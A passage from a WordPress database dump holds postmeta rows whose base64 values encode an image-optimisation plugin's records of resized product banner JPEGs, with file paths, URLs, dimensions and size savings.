C91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTM0MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMzQweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDU3MCwiaWQiOjEyMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTgwMHg1OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci04MDB4NTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTgwMHg1OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1NzIsImlkIjoxMjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci03Njh4NTUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItNzY4eDU1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci03Njh4NTUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NTc0LCJpZCI6MTIxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMjUweDY4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTI1MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMjUweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDU3NywiaWQiOjEyMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTIwMHg2OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci0yMDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTIwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1NzksImlkIjoxMjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci0yMjV4NjguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMjI1eDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci0yMjV4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NTgxLCJpZCI6MTIxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItNTEweDY4LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTUxMHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItNTEweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDU4MywiaWQiOjEyMTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMTE0eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci0xMTR4NjguanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMTE0eDY4LmpwZyIsInJlZHVjdGlvbiI6MTQ3LCJ0aW1lIjoxNDgzNTc0NTg1LCJpZCI6MTIxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci0xNjB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTE2MHg2OC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci0xNjB4NjguanBnIiwicmVkdWN0aW9uIjo1OSwidGltZSI6MTQ4MzU3NDU4NywiaWQiOjEyMTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMTgweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zb2x2ZW50LWJhbm5lci0xODB4NjguanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMTgweDY4LmpwZyIsInJlZHVjdGlvbiI6MjQsInRpbWUiOjE0ODM1NzQ1ODksImlkIjoxMjE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTI0N3g2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMjQ3eDY4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTI0N3g2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1OTIsImlkIjoxMjE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTMwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItMzAweDY4LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTMwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1OTQsImlkIjoxMjE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTQwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc29sdmVudC1iYW5uZXItNDAweDY4LmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNvbHZlbnQtYmFubmVyLTQwMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ1OTYsImlkIjoxMjE4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29692, 1210, 'wpfc_optimisation_reduction', '1652'); 
INSERT INTO `wp_postmeta` VALUES (29693, 1210, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMuanBnIiwid2lkdGgiOjk0NSwiaGVpZ2h0Ijo2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMuanBnIiwicmVkdWN0aW9uIjoxMDIwLCJ0aW1lIjoxNDgzNTc0NjAzLCJpZCI6IjEyMTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMzQweDY4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0zNDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0zNDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjA1LCJpZCI6MTIxMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTgwMHg1OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtODAweDU4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtODAweDU4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDYwNywiaWQiOjEyMTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy03Njh4NTUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTc2OHg1NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTc2OHg1NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2MDksImlkIjoxMjEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMjUweDY4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0yNTB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0yNTB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjExLCJpZCI6MTIxMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTIwMHg2OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMjAweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMjAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDYxMywiaWQiOjEyMTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0yMjV4NjguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTIyNXg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTIyNXg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ2MTUsImlkIjoxMjEwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtNTEweDY4LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy01MTB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy01MTB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NjE3LCJpZCI6MTIxMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMTE0eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMTE0eDY4LmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0xMTR4NjguanBnIiwicmVkdWN0aW9uIjozODksInRpbWUiOjE0ODM1NzQ2MjAsImlkIjoxMjEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0xNjB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGlnaC10ZW1wZXJhdHVyZS1yZWxlYXNlLWFnZW50cy1lMTQ3MjgzNzU1MjgzMy0xNjB4NjguanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTE2MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjExMiwidGltZSI6MTQ4MzU3NDYyMiwiaWQiOjEyMTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTE4MHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IaWdoLXRlbXBlcmF0dXJlLXJlbGVhc2UtYWdlbnRzLWUxNDcyODM3NTUyODMzLTE4MHg2OC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMTgweDY4LmpwZyIsInJlZHVjdGlvbiI6MTIxLCJ0aW1lIjoxNDgzNTc0NjI0LCJpZCI6MTIxMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMjQ3eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hpZ2gtdGVtcGVyYXR1cmUtcmVsZWFzZS1hZ2VudHMtZTE0NzI4Mzc1NTI4MzMtMjQ3eDY4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZG